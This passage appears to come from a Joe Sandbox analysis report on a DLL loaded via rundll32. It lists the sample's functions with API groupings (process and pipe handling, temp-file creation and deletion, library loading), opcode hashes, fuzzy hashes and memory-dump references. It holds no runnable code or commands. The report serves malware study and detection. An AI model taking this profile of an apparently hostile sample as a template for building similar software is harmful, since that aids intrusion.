    • SetLastError.KERNEL32(?,?,?,00007FFE1150F235,?,?,?,?,00007FFE1150E5BF,?,?,00000000,00007FFE1150F9C5,?,?,?), ref: 00007FFE1150FAA3
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 79c5636aeb9a70195001eef8bfab838ba4450b33627de5dca7391d2d6ea7290f
    • Instruction ID: b8545d4320e999c04060333b7ed065723d9ade43653efe54ef95ca46b74ccfe7
    • Opcode Fuzzy Hash: 79c5636aeb9a70195001eef8bfab838ba4450b33627de5dca7391d2d6ea7290f
    • Instruction Fuzzy Hash: 1F118E20F09E5283FB5AA7A3555413C62AE9F447F0F1005BED91E037F6EE6CE8418301
    Function 00007FFE11501E00 Relevance: 3.0, APIs: 2, Instructions: 25threadCOMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: ChangeCloseCreateFindNotificationThread
    • String ID:
    • API String ID: 4060959955-0
    • Opcode ID: 71b8b0b6f66aa09b918a2002ed21724a191b18b371f1758d3ade0c485f45f7bd
    • Instruction ID: 8c7d03f4ea30bde69283846a5d5c56b7732b5d2d681d90242cc7e2cf2dddef5c
    • Opcode Fuzzy Hash: 71b8b0b6f66aa09b918a2002ed21724a191b18b371f1758d3ade0c485f45f7bd
    • Instruction Fuzzy Hash: D6F01472918B818AD350CF52E48835EBBA4FB883A4F500479FA8A42B78DF7CC484CB40
    Function 00007FFE11506950 Relevance: 3.0, APIs: 2, Instructions: 9memoryCOMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: Heap$AllocateProcess
    • String ID:
    • API String ID: 1357844191-0
    • Opcode ID: 9329e4d84ccb99430093e794eead5b662097cfe0c186392e508571b5f5f7c090
    • Instruction ID: 773beb871a3079482184e336c4a3abbd712044a7542898004f5ae4519fd9e652
    • Opcode Fuzzy Hash: 9329e4d84ccb99430093e794eead5b662097cfe0c186392e508571b5f5f7c090
    • Instruction Fuzzy Hash: 6EC01264E25A4182DB046B62A4491596775FB89750F504078D98902734DD3CC0998B00
    Function 00007FFE115157B0 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID:
    • API String ID: 3215553584-0
    • Opcode ID: ad834de6681e54c79edc797017fbf8dae2ed4ae770d08526102acd3bb7e72e1a
    • Instruction ID: 59d96bc363c74d8327a0620811770adfa735cb3338bb0b7939df8c974616f4ff
    • Opcode Fuzzy Hash: ad834de6681e54c79edc797017fbf8dae2ed4ae770d08526102acd3bb7e72e1a
    • Instruction Fuzzy Hash: 58115E32A2CF42D6F3119B92A44123D76AAFB413A8F6800B5EA8D477B1DF3CF9008700
    Function 00007FFE1150E558 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • RtlAllocateHeap.NTDLL(?,?,00000000,00007FFE1150F9C5,?,?,?,00007FFE1150BB84,?,?,?,00007FFE1150CC91), ref: 00007FFE1150E5AD
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 9d202d867305b54c680245dbf04660641440753b6715bf975ef5052a3991603a
    • Instruction ID: 2db8398375ac1a7fe4690c4f7c9cb5e59645299b064c934165a107bbc7c99bd8
    • Opcode Fuzzy Hash: 9d202d867305b54c680245dbf04660641440753b6715bf975ef5052a3991603a
    • Instruction Fuzzy Hash: 32F06D44B09E1341FF5597F369212BD128E9F89BB0F2C58B9C80E863F2FE1DE4809210
    Function 00007FFE11501F00 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: Sleep
    • String ID:
    • API String ID: 3472027048-0
    • Opcode ID: fe412710fa9a1c2aba127212d301d3a02b7c2680fcf65a97a709af9942d7cfd2
    • Instruction ID: cad988e6647b22fc80136b654d4255fad5e019a2ef0b0aadca2b636435c17797
    • Opcode Fuzzy Hash: fe412710fa9a1c2aba127212d301d3a02b7c2680fcf65a97a709af9942d7cfd2
    • Instruction Fuzzy Hash: E7C04C51D0D943C6FB99179398D933C2169AB64321F9141FCD61D012F09F2C65D58A22

    Non-executed Functions

    Function 00007FFE11507F60 Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 274fileprocesslibraryCOMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: File$CloseHandle$Delete$Process$CreateTemp$ByteCharMultiNameWideswprintfwcscat$AddressDirectoryHeapLanguagesLibraryLoadPathPreferredProcRestoreSystemThread_vswprintf_s_lwcscpy
    • String ID: %ls "%ls"$%ls\%ls "%ls",$dat$h
    • API String ID: 654103805-3870102533
    • Opcode ID: 8b3cb215889b0d371f3da684f6cdebf913241e7f9246b566288e5101e093d20b
    • Instruction ID: 5bfeff18365a4b7eab4a10a31c8e98c43e2627b559f18617558a419dbb7442a9
    • Opcode Fuzzy Hash: 8b3cb215889b0d371f3da684f6cdebf913241e7f9246b566288e5101e093d20b
    • Instruction Fuzzy Hash: E8F10632A1CE8285E760DB62E4547AFB3A9FBC5764F40407AD68D42AB9DF3CD548CB40
    Function 00007FFE115070A0 Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 173libraryloaderwindowCOMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressProc$Object$CompatibleCreateDeleteLibraryLoadMetricsSystem$BitmapReleaseSelect
    • String ID:
    • API String ID: 1533257422-3916222277
    • Opcode ID: 4baea973d72330b54929f1745f4d6fd4273bb32029f5c8a4967c10ab87e99a1e
    • Instruction ID: c3e25ae1390aa10cab52ba181b76ae744336b63918ddce8ac9c8179a51cc1dca
    • Opcode Fuzzy Hash: 4baea973d72330b54929f1745f4d6fd4273bb32029f5c8a4967c10ab87e99a1e
    • Instruction Fuzzy Hash: A3B1C73290DF86C5E760ABA6F85436A73A9FB84764F0000B9D98D93675DF7CE488CB01
    Function 00007FFE11502740 Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 306pipesleepprocessCOMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: Handle$Close$ByteCharCurrentDirectoryMultiProcessWide$CreateHeapPipe$AllocateFileInformationNamedObjectPeekReadSingleSleepTerminateWait_vswprintf_s_lswprintf
    • String ID: $$2$h
    • API String ID: 3838355756-1214087042
    • Opcode ID: 59938e374b416ba04519ddff59002b1483effda1c76f174347341531ffb64343
    • Instruction ID: 8678da5d2f6eac6f776046c8e1fb644484ef45b6360f1e12140913950971e542
    • Opcode Fuzzy Hash: 59938e374b416ba04519ddff59002b1483effda1c76f174347341531ffb64343
    • Instruction Fuzzy Hash: FB02F732608AC186E760DB56E4543AEB7A5FBC47A4F004179EA8D43BB9DF7CD489CB40
    Function 00007FFE11513B40 Relevance: 24.1, APIs: 9, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
    • API String ID: 281475176-2761157908
    • Opcode ID: c0f935cb567f563a433567c347b6aa22b70d71aea3869bc0075b4a5acf723f8a
    • Instruction ID: 7ae0264016fedb8d51f03d6bcbcffe8b4a980bc37eb46c84cad40eb5ecdc378b
    • Opcode Fuzzy Hash: c0f935cb567f563a433567c347b6aa22b70d71aea3869bc0075b4a5acf723f8a
    • Instruction Fuzzy Hash: E8B21B72A089828BE7668E66D4407FD3BAAFB443ACF506135DA0957BB5DF3CE504CB00
    Function 00007FFE1150ECD0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
    • String ID:
    • API String ID: 1239891234-0
    • Opcode ID: 96d1b2251808390a899ca332325b000b59ea61d1b8f112abec86d48cf742ac05
    • Instruction ID: dd351527d510806296985be7e505bc077d05956019e0c7c58cd6712a7226818b
    • Opcode Fuzzy Hash: 96d1b2251808390a899ca332325b000b59ea61d1b8f112abec86d48cf742ac05
    • Instruction Fuzzy Hash: 91315F36618F8186EB61CF66E8442AE73A8FB84764F540179EA9D43BB4EF3CC545CB00
    Function 00007FFE11511404 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
    Download Yara Rule
    APIs
    • _invalid_parameter_noinfo.LIBCMT ref: 00007FFE11511434
      • Part of subcall function 00007FFE1150EEFC: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FFE1150EEDA), ref: 00007FFE1150EF05
      • Part of subcall function 00007FFE1150EEFC: GetCurrentProcess.KERNEL32(?,?,?,?,00007FFE1150EEDA), ref: 00007FFE1150EF29
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
    • String ID: *?$.
    • API String ID: 4036615347-3972193922
    • Opcode ID: eba59fe5f0c93d1134c9cc44fef27bef4db73f0af7df213452137592245963f0
    • Instruction ID: cf0ee9f23ab558ef7455463922a729bc26fc2f30fb62863ce89ba980e0ff3713
    • Opcode Fuzzy Hash: eba59fe5f0c93d1134c9cc44fef27bef4db73f0af7df213452137592245963f0
    • Instruction Fuzzy Hash: 24510222B14E9585EF12CFB398404BC73AAFB48BE8B454575DE1E17BA5EE3CD0428300
    Function 00007FFE11513670 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: memcpy_s
    • String ID:
    • API String ID: 1502251526-0
    • Opcode ID: 7c95d79a6932f591ae303023ad9bcf5e3cdb31da0663f78c422ae26a9081d948
    • Instruction ID: f282726e652966331a041c7bc3a4db22bf4aa52d0673ab6b8ef2981d8fbe3d09
    • Opcode Fuzzy Hash: 7c95d79a6932f591ae303023ad9bcf5e3cdb31da0663f78c422ae26a9081d948
    • Instruction Fuzzy Hash: F7D11732B1CA8687DB75CF16E19466AB7A6F7887A4F048134CB4E53B65DB3CE841CB00
    Function 00007FFE11511610 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID: .
    • API String ID: 0-248832578
    • Opcode ID: 690e74d9563e45a385418573fd4113d3bcedef93829ea6a1ba73e3ce572bc25b
    • Instruction ID: 52f4f84719267b4443a0237a69dbf5c78896e787aaa9880f17867a0481f531fb
    • Opcode Fuzzy Hash: 690e74d9563e45a385418573fd4113d3bcedef93829ea6a1ba73e3ce572bc25b
    • Instruction Fuzzy Hash: C1310922B14E9145FB219A33E8447A97A96AB85BF4F188775DE6C07BF5DE3CD5018300
    Function 00007FFE11518038 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: ExceptionRaise_clrfp
    • String ID:
    • API String ID: 15204871-0
    • Opcode ID: 94c2968fe9688432277f6621fdc766de3035e6626ea0afa950c38092a09ec5a0
    • Instruction ID: 8b8be4b047476fbaf27b86488a862edc934dfc5e98bb6822c47736a9947ce570
    • Opcode Fuzzy Hash: 94c2968fe9688432277f6621fdc766de3035e6626ea0afa950c38092a09ec5a0
    • Instruction Fuzzy Hash: 74B15B77600F898BEB26CF2AC8463687BA5F744B98F188961DA6D837B4CB3DD451C700
    Function 00007FFE1150C0EC Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: 0
    • API String ID: 3215553584-4108050209
    • Opcode ID: 4ff7d4c7d393e257493e51469c247c4ef46c7115a0845f9b5667b104312fce9a
    • Instruction ID: db7cfdaed86d33e9f882269956960432e5f508e8c15ccfd88e74b7f42484409d
    • Opcode Fuzzy Hash: 4ff7d4c7d393e257493e51469c247c4ef46c7115a0845f9b5667b104312fce9a
    • Instruction Fuzzy Hash: 67812622A18F0342EB688AE7804067D2398EF43B64F5415FEDD4E97AB5CF2DE946D740
    Function 00007FFE1150DF94 Relevance: 1.4, Strings: 1, Instructions: 139COMMONLIBRARYCODE
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID: @
    • API String ID: 0-2766056989
    • Opcode ID: 97c779eb9e8cda604945b158143a5e17b1ebf053f90b93598c274ff6021d9a15
    • Instruction ID: 999046cb380076e96b3a5e44c7371b2e5817b67ca4f1a39dbb858c2b6eccfeea
    • Opcode Fuzzy Hash: 97c779eb9e8cda604945b158143a5e17b1ebf053f90b93598c274ff6021d9a15
    • Instruction Fuzzy Hash: A241C072714E5486EB08CF6AD9242A973A6F788FE0B59A036DE0D87774EE3CD046C300
    Function 00007FFE11517C10 Relevance: .0, Instructions: 32COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2a7933b61f368365aa16494b3c6ceea95da0c303d67b3bf46b553378c5ff89ad
    • Instruction ID: e7265b4d9134935b7ad023d598bab983dc97038752d56024db650367a2c1557f
    • Opcode Fuzzy Hash: 2a7933b61f368365aa16494b3c6ceea95da0c303d67b3bf46b553378c5ff89ad
    • Instruction Fuzzy Hash: E3F0A472A28A918ADB98CF69A442A293795F758390B408079D59883E24C73C80608F04
    Function 00007FFE11506300 Relevance: 39.1, APIs: 26, Instructions: 139fileCOMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: wcscat$wcscpy$DeleteFile$DirectoryEnvironmentExpandRemoveStrings
    • String ID:
    • API String ID: 2221106753-0
    • Opcode ID: e4d83268c653e65681527fc978cd474a44451df63d8d25433c1058a36e54ff64
    • Instruction ID: 7069be29a495b9c4d11c911955dc9908b0f8a7f38bf199982dcd3ea5ac098c9c
    • Opcode Fuzzy Hash: e4d83268c653e65681527fc978cd474a44451df63d8d25433c1058a36e54ff64
    • Instruction Fuzzy Hash: 4281F23261CE8685EB20EB62E4913BEB325FBD5754F801076E68D469B9DF3CD909CB40
    Function 00007FFE115063BC Relevance: 39.1, APIs: 26, Instructions: 97fileCOMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
